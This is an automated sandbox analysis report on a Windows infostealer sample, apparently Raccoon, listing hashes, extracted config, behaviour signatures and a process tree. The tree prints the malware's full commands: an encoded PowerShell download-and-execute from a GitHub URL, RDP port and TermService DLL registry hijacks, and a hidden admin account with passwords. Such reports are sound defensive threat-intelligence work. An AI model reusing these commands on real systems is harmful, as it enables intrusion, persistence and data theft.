Analysis
- max time kernel: 88s
- max time network: 152s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 02-06-2021 18:08

Tasks
- Static task: static1
- Behavioral task: behavioral1 (Sample: f13060a6789449453b7d4a4b815cc80d.exe, Resource: win7v20210410)
- Behavioral task: behavioral2 (Sample: f13060a6789449453b7d4a4b815cc80d.exe, Resource: win10v20210410)
General
- Target: f13060a6789449453b7d4a4b815cc80d.exe
- Size: 567KB
- MD5: f13060a6789449453b7d4a4b815cc80d
- SHA1: 77d3b0a202710d93c660aca624a63a97811b8f9e
- SHA256: 2b9b67b6e376ed8db68a8b219209981c865a2a26a4c4cd926b79cf2fddb57d54
- SHA512: 78ed128be390ff896fb83b4cac8b30db20258f985d8f86d61f64da19cbd0bd8e2891a46fbdee1ad09e6d99fda697dfb12650deb1c628979b3a4133c438313b55
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
- Extracted: raccoon
  e46634757936706c1ff491585768dd6fe231db30
  url4cnc: https://tttttt.me/jdiamond13
Signatures

Grants admin privileges (1 TTPs)
Uses net.exe to modify the user's privileges.

Blocklisted process makes network request (9 IoCs)
Processes (flow, pid, process):
- flow 20: 3872 powershell.exe
- flow 23: 3872 powershell.exe
- flow 24: 3872 powershell.exe
- flow 25: 3872 powershell.exe
- flow 27: 3872 powershell.exe
- flow 29: 3872 powershell.exe
- flow 31: 3872 powershell.exe
- flow 33: 3872 powershell.exe
- flow 35: 3872 powershell.exe
Downloads MZ/PE file

Executes dropped EXE (1 IoCs)
Processes (pid, process):
- 2128 ZyKUG6PQzM.exe
Modifies RDP port number used by Windows (1 TTPs)

Sets DLL path for service in the registry (2 TTPs)

Resources matching yara rule (resource, yara_rule):
- \Windows\Branding\mediasrv.png: upx
- \Windows\Branding\mediasvc.png: upx

Loads dropped DLL (3 IoCs)
Processes (pid, process):
- 4048 f13060a6789449453b7d4a4b815cc80d.exe
- 3636
- 3636
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Drops file in Program Files directory (4 IoCs)
Processes (description, ioc, process):
- File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT (powershell.exe)
- File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI (powershell.exe)
- File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT (powershell.exe)
- File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI (powershell.exe)
Drops file in Windows directory (19 IoCs)
Processes (description, ioc, process; all by powershell.exe):
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI799A.tmp
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI79EC.tmp
- File created: C:\Windows\branding\mediasrv.png
- File opened for modification: C:\Windows\branding\ShellBrd
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_2g55yrqt.z5h.ps1
- File created: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI79BB.tmp
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI79CB.tmp
- File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat
- File created: C:\Windows\branding\wupsvc.jpg
- File opened for modification: C:\Windows\branding\mediasrv.png
- File opened for modification: C:\Windows\branding\wupsvc.jpg
- File opened for modification: C:\Windows\branding\Basebrd
- File opened for modification: C:\Windows\branding\mediasvc.png
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
- File created: C:\Windows\branding\mediasvc.png
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_nehj2dc3.eot.psm1
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI79FC.tmp
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Delays execution with timeout.exe (1 IoCs)
Processes (pid, process):
- 3408 timeout.exe

Modifies data under HKEY_USERS (64 IoCs)
Processes: powershell.exe, WMIC.exe, WMIC.exe
Modifies registry key (1 TTPs, 1 IoCs)

Runs net.exe

Script User-Agent (2 IoCs)
Uses user-agent string associated with script host/environment.
Processes (description, flow, ioc):
- HTTP User-Agent header, flow 23: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header, flow 25: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses (18 IoCs)
Processes (pid, process):
- 2168 powershell.exe (3 hits)
- 2416 powershell.exe (3 hits)
- 2984 powershell.exe (3 hits)
- 3936 powershell.exe (3 hits)
- 2168 powershell.exe (3 hits)
- 3872 powershell.exe (3 hits)

Suspicious behavior: LoadsDriver (2 IoCs)
Processes (pid, process):
- 624
- 624
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: powershell.exe (pids 2168, 2416, 2984, 3936); tokens enabled include SeDebugPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeBackupPrivilege and SeRestorePrivilege.
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: f13060a6789449453b7d4a4b815cc80d.exe, ZyKUG6PQzM.exe, powershell.exe, csc.exe, cmd.exe and net.exe writing to the memory of their child processes (the parent/child pairs are shown in the process tree below).
Processes (process tree; nesting shows parent/child depth, each node gives the image path and the command line)

- [1] C:\Users\Admin\AppData\Local\Temp\f13060a6789449453b7d4a4b815cc80d.exe
  Command: "C:\Users\Admin\AppData\Local\Temp\f13060a6789449453b7d4a4b815cc80d.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  - [2] C:\Users\Admin\AppData\Local\Temp\ZyKUG6PQzM.exe
    Command: "C:\Users\Admin\AppData\Local\Temp\ZyKUG6PQzM.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nj0rhsok\nj0rhsok.cmdline"
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4339.tmp" "c:\Users\Admin\AppData\Local\Temp\nj0rhsok\CSC4A9A379BCE29450F98C1A91E8A88D1F.TMP"
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\system32\reg.exe
        Command: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      - [4] C:\Windows\system32\reg.exe
        Command: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies registry key
      - [4] C:\Windows\system32\reg.exe
        Command: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
      - [4] C:\Windows\system32\net.exe
        Command: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\net1.exe
          Command: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      - [4] C:\Windows\system32\cmd.exe
        Command: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\cmd.exe
          Command: cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory
          - [6] C:\Windows\system32\net.exe
            Command: net start rdpdr
            - Suspicious use of WriteProcessMemory
            - [7] C:\Windows\system32\net1.exe
              Command: C:\Windows\system32\net1 start rdpdr
      - [4] C:\Windows\system32\cmd.exe
        Command: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\cmd.exe
          Command: cmd /c net start TermService
          - Suspicious use of WriteProcessMemory
          - [6] C:\Windows\system32\net.exe
            Command: net start TermService
            - Suspicious use of WriteProcessMemory
            - [7] C:\Windows\system32\net1.exe
              Command: C:\Windows\system32\net1 start TermService
      - [4] C:\Windows\system32\cmd.exe
        Command: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
      - [4] C:\Windows\system32\cmd.exe
        Command: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
  - [2] C:\Windows\SysWOW64\cmd.exe
    Command: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\f13060a6789449453b7d4a4b815cc80d.exe"
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\timeout.exe
      Command: timeout /T 10 /NOBREAK
      - Delays execution with timeout.exe

- [1] C:\Windows\System32\cmd.exe
  Command: cmd /C net.exe user wgautilacc Ghar4f5 /del
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command: net.exe user wgautilacc Ghar4f5 /del
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command: C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del

- [1] C:\Windows\System32\cmd.exe
  Command: cmd /C net.exe user wgautilacc kYvjN912 /add
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command: net.exe user wgautilacc kYvjN912 /add
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command: C:\Windows\system32\net1 user wgautilacc kYvjN912 /add

- [1] C:\Windows\System32\cmd.exe
  Command: cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command: net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

- [1] C:\Windows\System32\cmd.exe
  Command: cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command: net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

- [1] C:\Windows\System32\cmd.exe
  Command: cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command: net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    - [3] C:\Windows\system32\net1.exe
      Command: C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD

- [1] C:\Windows\System32\cmd.exe
  Command: cmd /C net.exe user wgautilacc kYvjN912
  - [2] C:\Windows\system32\net.exe
    Command: net.exe user wgautilacc kYvjN912
    - [3] C:\Windows\system32\net1.exe
      Command: C:\Windows\system32\net1 user wgautilacc kYvjN912

- [1] C:\Windows\System32\cmd.exe
  Command: cmd.exe /C wmic path win32_VideoController get name
  - [2] C:\Windows\System32\Wbem\WMIC.exe
    Command: wmic path win32_VideoController get name
    - Modifies data under HKEY_USERS

- [1] C:\Windows\System32\cmd.exe
  Command: cmd.exe /C wmic CPU get NAME
  - [2] C:\Windows\System32\Wbem\WMIC.exe
    Command: wmic CPU get NAME
    - Modifies data under HKEY_USERS

- [1] C:\Windows\System32\cmd.exe
  Command: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - [2] C:\Windows\system32\cmd.exe
    Command: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      (The -enc argument is base64 of the UTF-16LE string: IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), the same URL listed under Malware Config.)
      - Blocklisted process makes network request
      - Drops file in Program Files directory
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses

- [1] C:\Windows\System32\cmd.exe
  Command: cmd.exe /C net user wgautilacc 1234
  - [2] C:\Windows\system32\net.exe
    Command: net user wgautilacc 1234
    - [3] C:\Windows\system32\net1.exe
      Command: C:\Windows\system32\net1 user wgautilacc 1234
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1
-
C:\Users\Admin\AppData\Local\Temp\RES4339.tmp
-
C:\Users\Admin\AppData\Local\Temp\ZyKUG6PQzM.exe
-
C:\Users\Admin\AppData\Local\Temp\nj0rhsok\nj0rhsok.dll
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1
-
\??\c:\Users\Admin\AppData\Local\Temp\nj0rhsok\CSC4A9A379BCE29450F98C1A91E8A88D1F.TMP
-
\??\c:\Users\Admin\AppData\Local\Temp\nj0rhsok\nj0rhsok.0.cs
-
\??\c:\Users\Admin\AppData\Local\Temp\nj0rhsok\nj0rhsok.cmdline
-
\Users\Admin\AppData\LocalLow\sqlite3.dll
-
\Windows\Branding\mediasrv.png
-
\Windows\Branding\mediasvc.png